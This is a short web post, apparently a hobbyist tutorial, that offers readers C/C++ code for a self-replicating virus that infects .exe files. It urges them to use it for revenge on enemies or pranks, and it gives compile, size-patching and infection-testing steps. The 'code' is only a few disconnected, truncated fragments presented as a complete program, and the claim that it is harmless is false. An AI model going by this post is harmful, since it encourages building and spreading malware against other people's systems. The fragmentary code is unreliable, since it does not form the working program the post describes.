Is your computer completely virus free? If it is then you have really done a great job in maintaining it. So many different viruses have been produced over the years that even it is difficult for the Anti Viruses to detect and delete it.
There are many different kinds of viruses some self replicating and some not. Well, if you also like to create your own virus, you can easily do so. I am providing you with a C/C++ code implementing which you can take revenge from your enemy, play prank on your friends or just let it free among the other viruses in the world. And yes it will not harm you.
This is the code to create your own virus:
unsigned long x;
struct ffblk ffblk;
if(host==NULL) goto next;
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,
This is how you can compile the code:
1. You require Borland TC 3.0, copy the code into the compiler and press Alt+F9, it will compile the code.
2. To generate the exe file of the virus press F9. Remember, Do Not Press CTRL+F9 as this will infect your system also.
3. Note the size of the generated exe file in Bytes.
4. Modify the value of X (which is 89088 initially) in the code above with the size noted in above step.
5. Go to step 1 and step 2 again. The exe file obtained now is the Virus and is ready to infect other systems.
1. Make a new folder and put some (any) exe files in it.
2. Also put this virus in it.
3. Run the virus and you will notice that the other exe files will get infected.
4. All the infected files are ready to reinfect.